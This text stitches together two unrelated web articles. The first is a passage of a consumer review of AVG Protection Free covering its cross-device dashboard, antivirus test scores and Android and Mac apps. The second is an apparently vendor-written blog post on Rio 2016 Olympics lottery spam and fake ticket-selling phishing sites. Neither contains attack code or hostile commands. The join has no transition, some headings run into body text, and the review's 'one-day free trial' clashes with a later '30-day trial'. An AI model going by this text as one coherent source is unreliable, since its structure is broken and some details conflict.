As for the Performance panel, clicking that one installed AVG PC TuneUp. Note, though, that this is a one-day free trial, so don't start it until you have some free time to exercise this tool's powerful performance enhancement features. Extending protection to additional devices is a snap. You click a button to start the process, choose Windows, Mac OS, or Android, and send an email to an account used on the device in question.

The email contains a link to download the appropriate app.
Install Zen, install the antivirus, and link the installation to your account by logging in.

That's it.

The new device shows up in Zen's lineup across the top. You can check the status of any device by clicking it, and you can even remotely launch a scan or an update. Protection for WindowsOn your Windows devices, AVG Protection installs AVG AntiVirus Free (2016).

Do please read that review for full details on the antivirus.
I will summarize my findings here. All five of the antivirus testing labs I follow include AVG in their evaluations. My aggregate lab test score calculation for AVG gives it 8.4 of 10 possible points. Kaspersky holds the best aggregate score, 9.7 points. In my own hands-on testing, AVG earned 8.8 of 10 possible points, which is good, but not at the top.

Top score among products tested with the same samples goes to Bitdefender Total Security 2016, with 9.3 points.

Tested against a newer sample set, Webroot SecureAnywhere Internet Security Complete (2016) managed a perfect 10. In my malicious URL blocking test, AVG blocked 73 percent of the samples.
Symantec Norton Security Premium blocked 91 percent of the malware downloads, and Avira Antivirus Pro 2016 fended off 99 percent.
In my antiphishing test, AVG lagged 28 percentage points behind Norton. This product's antivirus protection isn't quite as good as the very best commercial antivirus tools, but it's impressive for a free antivirus.

AVG AntiVirus Free is an Editors' Choice for free antivirus, sharing that honor with Avast Free Antivirus 2016 and Panda Free Antivirus (2016). Protection for AndroidTo get a feel for AVG's Android protection, I sent a link to a Nexus 9 that I use for testing.

The user interface has changed since we reviewed AVG AntiVirus Security (for Android); no more color-coded circles! But the feature set remains effectively the same; refer to that review for additional details. Zen on the tablet retains those familiar circles, and works just as it does on Windows. For a complete installation, you need enable Anti-Theft and make AVG a Device Administrator. You'll probably also want to click the link that installs the free AVG Cleaner for Android.

As with AVG Protection itself, you can opt to get a 30-day trial of the paid edition.
I chose not to do so, and therefore found myself viewing banner ads across the bottom of the app's display. AVG scans your apps for malware and can optionally scan external storage.
It also finds and flags problems with security settings, offering instructions for correcting configuration errors.

The Safe Web Surfing feature steers your browser away from malicious and fraudulent URLs. Performance features include a task killer, to save battery life by ending unnecessary tasks, as well as a battery power tracker with an option to automatically turn off power-hungry features when battery power gets low.

AVG can also track your storage usage and monitor use of your data plan by apps. There's probably a better chance your Android device will be lost or stolen than that it will suffer a malware attack.

AVG offers a full-scale anti-theft component. You can use coded text messages or the online console to remotely locate, lock, or wipe the device, or trigger a noise to help you find a mislaid tablet.

That's it for the free edition.

The for-pay edition adds Camera Trap, which snap a thief's photo, and can also lock the device if a thief removes the SIM card.
It can protect private data and user-specified apps with a PIN code.

And it can back up your apps to an SD card. The free app installed by AVG Protection Free includes antivirus and anti-theft, the pillars of an Android security product, but lacks a number of useful features from the paid app. Our Editors' Choice products for Android antivirus are Norton Security and Antivirus (for Android) and Bitdefender Mobile Security and Antivirus (for Android). Like AVG, both of these offer a free edition with only the most necessary features. Mac ProtectionAVG AntiVirus (for Mac) is a free product. You could download and install it without any connection to AVG Protection, but then you'd miss out on the remote-control power of AVG Zen. This free, simple product offers protection against viruses and other types of malware.
It scans on demand and in real time.

To make sure your other devices don't get infected by way of the Mac, it looks for PC and Android malware as well.

And of course you'll find the user interface familiar. Keep those circles green! Norton gives Mac users rather more in the way of features.
It includes a firewall, a vulnerability scanner, and password protection for files, among other things. McAfee LiveSafe is somewhere between, with antivirus, firewall, Web reputation reporting, and password management. Free Isn't EnoughI rated the paid AVG Protection three stars, meaning it's good, but not outstanding.

For Windows devices, the paid edition installs AVG Internet Security, which doesn't rate as highly as the free antivirus because other components don't measure up.

Android protection in the paid edition is good, but Macs just get a simple always-free antivirus. With AVG Protection Free, the Android app loses Pro-only features and PCs just get a free antivirus—a good one—rather than a full security suite.
It's great that this product is free, and you still get the helpful remote management of AVG Zen, but competing (paid) cross-platform suites offer so much more.
In this instance, you really do get what you pay for. Symantec Norton Security Deluxe excels in just about every area and comes with 25GB of hosted online storage.
It protects PCs and Macs with a full security suite, and its Android version is an Editors' Choice. Where Symantec lets you protect 10 devices, McAfee LiveSafe puts no limit on the number of Windows, Mac OS, Android, iOS, and Blackberry devices you can connect.

These two are our Editors' Choice cross-platform multi-device security suites.

The Rio Olympics: Scammers Already Competing

A few years ago, spammers and scammers were not as interested in the Olympics as they were in football (the World Cup and European Championships).

The first major increase in the number of spam messages devoted to the Olympic Games occurred in the run-up to the Winter Olympics in Sochi in 2014.
Since then, their interest in the Olympics has shown no sign of weakening and the upcoming event in Brazil is no exception. Back in 2015, a year before the Olympics in Rio, we registered fake notifications of lottery wins allegedly organized by the country’s government and the International Olympic Committee.
Similar emails continue to be sent in 2016.

The vast majority of these messages contain a DOC or PDF attachment, while the body of the message includes only a brief text asking the recipient to open the attachment. The name of the DOC file, the name of the sender and the subject line of the email often mention the Olympic Games. The content of these attachments is fairly standard: a lottery was held by an official organization; the recipient’s address was randomly selected from a large number of email addresses, and to claim their winnings the recipient has to respond to the email and provide the necessary personal information. We also came across emails without attachments; the text written by the scammers was included in the body of the message. English is undoubtedly the most popular language used in fraudulent emails exploiting the Olympics theme, but we have also registered messages in other languages, for example Portuguese.
In these the spammers stuck to the same story of a lottery win, trying to convince the recipient that the email is genuine. In addition to fraudulent spam, we have registered unsolicited advertising messages containing offers for various goods and services that, one way or another, use the Olympics to grab the attention of recipients. For example, spammers have been pushing new TVs for watching sporting events. They also promised to make the recipient an “Olympic champion” with the help of magic pills. Taking any of these emails seriously enough to reply to them could well leave you out of pocket.

But the biggest hit that sporting fans’ wallets are likely to take are from fake ticketing services. We are constantly blocking dozens of newly registered domains with names containing the words “rio”, “rio2016” and so on.

Each of these domains hosted good quality imitations of official services offering tickets to sporting events at this summer’s games in Rio de Janeiro. The scammers register these domains to make their sites look more credible; for the same purpose, they often buy the cheapest and simplest SSL certificates.

These certificates are registered within a few minutes, and certification authorities don’t verify the legal existence of the organization that has issued the certificate.

The certificates simply provide data transfer over a secure protocol for the domain and, most importantly, gives fraudsters the desired “https” at the beginning of their address. If you examine the whois data for such domains, you will find that they have only been registered recently, for a short period of time (usually a year) and in the names of individuals. Moreover, the detailed information is often hidden, and the hosting provider could be located anywhere, from Latin America to Russia. The sites are necessary to implement a simple scam whereby the phishers ask for bank card information, allegedly to pay for tickets, and then use it to steal money from the victim’s bank account.
In order to keep the buyer in the dark for some time, the scammers assure them that the payment has been received for the tickets and that they will be sent out two or three weeks before the event. As a result, the criminals not only steal the victim’s money but deprive them of the chance of attending the Olympics – by the time they realize they won’t be getting the tickets they booked it will be too late to buy genuine tickets… especially if there’s no money in their bank account. According to our information, the creation of these fake sites usually involves international cybercriminal groups, each fulfilling its own part of the scam. One group creates a website, the second registers the domains, the third collects people’s personal information and sells it, and the fourth withdraws the cash. To avoid falling victim to the scammers’ tricks, sports fans should be careful and only buy tickets from authorized reseller sites and ignore resources offering tickets at very low prices.

The official website of the Olympic Games provides a list of official ticket sellers in your region and a service that allows you to check the legitimacy of sites selling tickets. Also, we strongly recommend not buying anything in stores advertised in spam mailings or advertising banners, whether it’s tickets or souvenirs related to the Olympics.

At best, you’ll end up with non-certified goods of dubious quality, and at worst – you’ll just be wasting your money.

For those who cannot resist impulse purchases, we recommend getting a separate bank card that is only used for online payments and which only ever has small sums of money on it.

This will help to avoid serious losses if your banking information is stolen.